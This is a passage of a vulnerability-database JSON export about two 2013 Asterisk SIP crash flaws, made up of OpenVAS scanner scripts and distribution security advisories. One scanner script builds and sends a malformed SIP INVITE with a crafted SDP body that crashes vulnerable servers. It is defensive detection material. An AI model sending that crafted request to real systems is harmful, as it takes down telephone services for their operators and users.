"OPENVAS:866888", "href": "http://plugins.openvas.org/nasl.php?oid=866888", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15567\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866888);\n script_version(\"$Revision: 8509 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-24 07:57:46 +0100 (Wed, 24 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:05 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15567\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15567\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115639.html\");\n script_tag(name: \"summary\" , value: \"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:03", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310892749", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892749\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2749.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(6|7)\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310866890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866890\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:21", "description": "This host is running Asterisk Server and is prone to denial of service\n vulnerability.", "cvss3": {}, "published": "2013-10-28T00:00:00", "type": "openvas", "title": "Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2019-03-05T00:00:00", "id": "OPENVAS:1361412562310802063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_asterisk_invalid_sdp_dos_vuln.nasl 13994 2019-03-05 12:23:37Z cfischer $\n#\n# Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:digium:asterisk\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802063\");\n script_version(\"$Revision: 13994 $\");\n script_cve_id(\"CVE-2013-5642\");\n script_bugtraq_id(62022);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-05 13:23:37 +0100 (Tue, 05 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-28 15:06:58 +0530 (Mon, 28 Oct 2013)\");\n script_name(\"Asterisk Products Invalid SDP SIP Channel Driver DoS Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_asterisk_detect.nasl\");\n script_mandatory_keys(\"Asterisk-PBX/Installed\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54534\");\n script_xref(name:\"URL\", value:\"https://issues.asterisk.org/jira/browse/ASTERISK-22007\");\n script_xref(name:\"URL\", value:\"http://downloads.asterisk.org/pub/security/AST-2013-005.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Asterisk Server and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send invalid SDP SIP request and check is it vulnerable to DoS or not.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Asterisk Open Source to 1.8.23.1, 10.12.3, 11.5.1 or later,\n Certified Asterisk to 1.8.15-cert3, 11.2-cert2 or later,\n Asterisk Digiumphones 10.12.3-digiumphones or later.\");\n\n script_tag(name:\"insight\", value:\"Error within the SIP channel driver when handling a crafted SDP in a SIP\n request.\");\n\n script_tag(name:\"affected\", value:\"Asterisk Open Source 1.8.x to 1.8.23.0, 10.x to 10.12.2 and 11.x to 11.5.0\n Certified Asterisk 1.8.15 to 1.8.15-cert2 and 11.2 to 11.2-cert1\n Asterisk Digiumphones 10.x-digiumphones to 10.12.2-digiumphones\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to cause a denial of\n service via a crafted SDP in a SIP request.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_xref(name:\"URL\", value:\"http://www.asterisk.org\");\n exit(0);\n}\n\ninclude(\"sip.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! infos = get_app_location_and_proto( cpe:CPE, port:port ) )\n exit( 0 );\n\nproto = infos[\"proto\"];\nif( ! sip_alive( port:port, proto:proto ) )\n exit( 0 );\n\nhost_name = get_host_name();\nthis_host = this_host();\n\nvtstrings = get_vt_strings();\nuseragent = vtstrings[\"default\"];\n\ncon_data = string(\"v=0\", \"\\r\\n\",\n \"o=user1 53655765 2353687637 IN IP4\", this_host,\"\\r\\n\",\n \"s=-\", \"\\r\\n\",\n \"t=0 0\", \"\\r\\n\",\n \"m=audio 6000 RTP/AVP 8 0\", \"\\r\\n\",\n \"m=video 6002 RTP/AVP 31\", \"\\r\\n\",\n \"c=IN IP4\", this_host);\n\ncraf_req = string( \"INVITE sip:test@\", host_name, \":\", port, \" SIP/2.0\", \"\\r\\n\",\n \"Via: SIP/2.0/\", toupper( proto ), \" \", this_host, \":\", port,\";branch=z9hG4bK-25912-1-0\",\"\\r\\n\",\n \"From: test1 <sip:guest0@\", this_host, \":\", port, \";tag=1\", \"\\r\\n\",\n \"To: test <sip:test@\", host_name, \":\", port, \">\", \"\\r\\n\",\n \"Call-ID: 1-25912@\", this_host, \"\\r\\n\",\n \"CSeq: 1 INVITE\", \"\\r\\n\",\n \"Contact: sip:guest@\", this_host, \":\", port, \"\\r\\n\",\n \"Max-Forwards: 70\", \"\\r\\n\",\n \"Subject: DoS Test\", \"\\r\\n\",\n \"User-Agent: \", useragent, \" DoS Test\", \"\\r\\n\",\n \"Content-Type: application/sdp\", \"\\r\\n\",\n \"Content-Length: \", strlen(con_data), \"\\r\\n\\r\\n\",\n con_data, \"\\r\\n\");\n\nsip_send_recv( port:port, data:craf_req, proto:proto );\nsleep( 2 );\n\nif( ! sip_alive( port:port, proto:proto ) ) {\n security_message( port:port, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:36:19", "description": "Gentoo Linux Local Security Checks GLSA 201401-15", "cvss3": {}, "published": "2015-09-29T00:00:00", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201401-15", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-2264", "CVE-2013-2685", "CVE-2013-5642", "CVE-2012-5976", "CVE-2012-5977", "CVE-2013-7100", "CVE-2013-2686"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310121112", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121112", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201401-15.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121112\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:26:35 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201401-15\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Asterisk. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201401-15\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\", \"CVE-2013-2264\", \"CVE-2013-2685\", \"CVE-2013-2686\", \"CVE-2013-5641\", \"CVE-2013-5642\", \"CVE-2013-7100\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201401-15\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 11.7.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(\"ge 1.8.25.0\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"net-misc/asterisk\", unaffected: make_list(), vulnerable: make_list(\"lt 11.7.0\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "A remotely exploitable crash vulnerability exists in the SIP channel driver if an ACK with SDP is received after the channel has been terminated. The handling code incorrectly assumes that the channel will always be present (CVE-2013-5641). A remotely exploitable crash vulnerability exists in the SIP channel driver if an invalid SDP is sent in a SIP request that defines media descriptions before connection information. The handling code incorrectly attempts to reference the socket address information even though that information has not yet been set (CVE-2013-5642). \n", "cvss3": {}, "published": "2013-08-30T17:36:06", "type": "mageia", "title": "Updated asterisk package fixes security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-30T17:36:06", "id": "MGASA-2013-0266", "href": "https://advisories.mageia.org/MGASA-2013-0266.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2023-02-24T13:09:32", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2749-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 02, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : asterisk\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-5641 CVE-2013-5642\n\nColin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony \ntoolkit -, which could result in denial of service.\n\nFor the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2013-09-02T14:48:20", "type": "debian", "title": "[SECURITY] [DSA 2749-1] asterisk security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-09-02T14:48:20", "id": "DEBIAN:DSA-2749-1:E342B", "href": "https://lists.debian.org/debian-security-announce/2013/msg00160.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Asterisk project reports:\n\nRemote Crash From Late Arriving SIP ACK With SDP\nRemote Crash when Invalid SDP is sent in SIP Request\n\n\n", "cvss3": {}, "published": "2013-08-27T00:00:00", "type": "freebsd", "title": "asterisk -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2013-08-29T00:00:00", "id": "FD2BF3B5-1001-11E3-BA94-0025905A4771", "href": "https://vuxml.freebsd.org/freebsd/fd2bf3b5-1001-11e3-ba94-0025905a4771.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T06:59:26", "description": "A denial of service vulnerability exists in Asterisk Open Source, Certified Asterisk and Asterisk with Digiumphones.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Invalid SDP Media Descriptions Denial of Service (CVE-2013-5642)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5642"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-2961", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:01:13", "description": "A denial of service vulnerability exists in Asterisk Open Source and Certified Asterisk.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "Digium Asterisk SIP Terminated Channel ACK with SDP Denial of Service (CVE-2013-5641)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-5641"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2013-3492", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:24:12", "description": "The SIP channel driver (channels/chan_sip.c) in Asterisk Open Source 1.8.x\nbefore 1.8.23.1, 10.x before 10.12.3, and 11.x before 11.5.1; Certified\nAsterisk 1.8.15 before 1.8.15-cert3 and 11.2 before 11.2-cert2; and\nAsterisk Digiumphones 10.x-digiumphones before 10.12.3-digiumphones allows\nremote attackers to cause a denial of service (NULL pointer dereference,\nsegmentation fault, and daemon crash) via an invalid SDP that defines a\nmedia description before the connection description in a SIP request.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=721220>\n", "cvss3": {}, "published": "2013-09-09T00:00:00", "type": "ubuntucve", "title": "CVE-2013-5642", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", 